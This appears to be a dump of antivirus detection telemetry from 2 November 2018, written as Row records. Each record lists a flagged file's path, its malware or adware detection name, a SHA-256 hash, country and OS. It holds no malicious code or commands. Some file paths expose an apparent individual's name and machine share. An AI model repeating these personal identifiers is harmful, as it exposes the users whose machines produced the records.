  Row(detection=Row(filename='avscan-20181102-054611-92a24397', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054611-92A24397', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050247-82ae5cfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050247-82AE5CFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055810-3f749da7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055810-3F749DA7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='60f5a3d0559cf42a82e15e242bc4d2d7902f9d508ab48739c0a4ab8d72dced53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\60F5A3D0559CF42A82E15E242BC4D2D7902F9D508AB48739C0A4AB8D72DCED53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='60f5a3d0559cf42a82e15e242bc4d2d7902f9d508ab48739c0a4ab8d72dced53', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_cg.exe', filepath='\\\\?\\C:\\NIFPGA\\programs\\Xilinx14_7\\ISE\\bin\\nt\\_cg.exe', filesize=448000, name='W32/Sality.AT.#M1.#R1'), hash='655e782110cfd248aca4d614bab9123d17d0beb896818c60f4da79f086d8d40e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061343-6b903e81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061343-6B903E81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143507-39d1b0b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143507-39D1B0B7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='\\\\Srv-adc\\users$\\Marius.Stoleriu\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T05:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qt5webenginecore.dll', filepath='D:\\steam\\steamapps\\common\\Trove\\Qt5WebEngineCore.dll', filesize=38528000, name='W32/Ramnit.CD.#M1.#R1'), hash='72d41b47726f9129dd59c62fdd4837d63b521cd38882b3e896e77a9aaa6b1860', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T19:49:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050255-8781c2eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050255-8781C2EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052250-4fde7ea1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052250-4FDE7EA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120352-0988a1ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120352-0988A1EC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='beetle.exe', filepath='f:\\العاب\\الضفدع الجزء لثنى\\العاب سباق سيارات\\beetle crazy cup dvnعربيات\\BEETLE.EXE', filesize=1024000, name='W32/Virut.Gen.#M1.#R1'), hash='6fde5adb2ce6562a8e4d46b9df0cabf66472bb89750adfc7eb5c97f1a956f981', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:48:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054546-844824b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054546-844824B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054516-71dd27dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054516-71DD27DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061012-edc64d54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061012-EDC64D54', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060801-9fd59f6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060801-9FD59F6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060815-a7dd3dd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060815-A7DD3DD4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053848-8b1856d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053848-8B1856D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052940-4419319c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052940-4419319C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060056-a24f2110', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060056-A24F2110', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052419-850b3314', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052419-850B3314', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052849-25854210', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052849-25854210', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060540-4be5fc08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060540-4BE5FC08', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061755-019621c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061755-019621C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052118-1900676a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052118-1900676A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055004-1df607b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055004-1DF607B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051040-9c9a9ff1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051040-9C9A9FF1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052704-e73f3593', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052704-E73F3593', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051334-04a03924', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051334-04A03924', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062541-179d2bd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062541-179D2BD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061633-d1129151', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061633-D1129151', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060332-ff139c64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060332-FF139C64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050404-b0614175', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050404-B0614175', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062533-12b523b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062533-12B523B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051355-11370744', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051355-11370744', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060350-0a1660c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060350-0A1660C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060833-b27e2664', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060833-B27E2664', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052140-260a9075', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052140-260A9075', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050623-037ed1df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050623-037ED1DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060957-e4d0442a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060957-E4D0442A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052643-dacde550', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052643-DACDE550', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054120-e5a40ab7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054120-E5A40AB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051749-9c733f08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051749-9C733F08', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053457-01050d47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053457-01050D47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054129-eadca398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054129-EADCA398', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060107-a8f37abb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060107-A8F37ABB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051246-e7d256f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051246-E7D256F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:40:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055908-620a8bbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055908-620A8BBB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054342-3a0d5311', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054342-3A0D5311', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1955dec1.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1955dec1.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:08:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:23:46Z'), dt=datetime.date(2018, 11, 2)),
